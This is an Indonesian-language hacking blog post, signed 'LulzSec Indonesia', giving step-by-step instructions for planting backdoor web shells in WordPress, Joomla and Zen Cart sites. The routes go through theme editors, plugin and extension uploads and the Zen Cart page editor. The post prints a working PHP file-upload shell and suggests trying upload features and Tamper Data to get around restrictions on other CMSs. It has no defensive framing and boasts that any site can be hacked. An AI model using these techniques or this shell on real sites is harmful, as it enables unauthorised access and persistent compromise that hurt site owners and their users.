Cara tanam shell backddor di joomla, worpress,zencart.dll

dear Lulzsec team

Tau gak sih backdoor itu apa ? yaa penjelasan singkatnya sih alat untuk menjelajahi website, menambah, mengurangi, mengedit file lewat pintu belakang atau secara diam diam 


Nah inti pada posting kali ini adalah kita akan membahas Bagaimana menanam shell backdoor di joomla , worpress , zencart ,Dll

Wordpress :

1. Theme-editor
Pergi ke appearance --> editor --> klik blabla.php --> ganti dengan script shell --> save --> pergi ke themes --> klik kanan pada theme yang dipake --> Open Image Location --> ganti /screenshot.png dgn blablabla.php tadi
[ex : www.macho.com/wp-content/themes/twentyten/single.php]

2. Upload plugin
Sisipkan shell pada folder plugin [ex : akismet] lalu masukan foldernya  ke zip
Pergi ke plugins --> add plugins --> upload
[akses shellnya di : www.macho.com/wp-content/plugins/macho/bener.php]
ket : macho itu nama folder, bener.php itu nama shell yang tadi sudah disisipkan

Joomla :

1. Install extention :
Pergi ke extentions --> Install / Uninstall --> Upload --> nanti ada bacaan error, cuekin aja
[akses : www.macho.com/tmp/shell.php]

2. Template manager :
Pergi ke extentions --> klik template manager --> pilih --> edit html -->
ganti dengan script shell --> save
[akses : alamatnya tertera disitu]

3. NinjaXplorer
 - Download plugins INI
 - Install lewat Extentions --> Install / Uninstall --> upload
 - Kalau sudah selesai, arahkan tab ke Components. Nah udah ke install kan Plugins yg tadi kita Upload, Selanjutnya masuk ke directory Plugins NinjaXplorer Tampilannya seperti ini :
- Setelah diupload, shell biasanya berada di http://www.target.com/news/backdoor.php atau http://www.target.com/backdoor.php

Zencart :

- Login ke page admin
- masuk ke file dimana kita bisa mengedit filefile [
http://site/path/admin/define_pages_editor.php]
- pilih plain text, dan pilih salah satu file yang mau kita edit dan masukkan script uploader atau shell kalian

<?phpecho '<b>Jundab<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data"name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])){ echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>


- masuk ke file yang kalian pilih tadi melalui index.php  index.php?main_page=$file
- contoh jika kalian memilih contact_us maka masuk ke file tersebut sebagai berikut : index.php?main_page=contact_us
- Tidak semua zencart bisa di edit filenya, karna sudah diberikan perm .
Kalaupun bisa diedit, belom tentu juga bisa upload file, karna dir dari path website tersebut di .htaccess atau diberikan permission ;)

Cms lain :
1. Cari fitur upload
[walaupun dilarang upload .php tapi dicoba aja dulu, banyak kok web yang kaya gitu :D]
2. Tamper Data
'' Sekuat kuat nya keamanan website pasti bisa di retas "

LulzSec Indonesiaeam]

Share this post

Post a comment

:ambivalent:
:angry:
:confused:
:content:
:cool:
:crazy:
:cry:
:embarrassed:
:footinmouth:
:frown:
:gasp:
:grin:
:heart:
:hearteyes:
:innocent:
:kiss:
:laughing:
:minifrown:
:minismile:
:moneymouth:
:naughty:
:nerd:
:notamused:
:sarcastic:
:sealed:
:sick:
:slant:
:smile:
:thumbsdown:
:thumbsup:
:wink:
:yuck:
:yum:

Next Post
Newer Post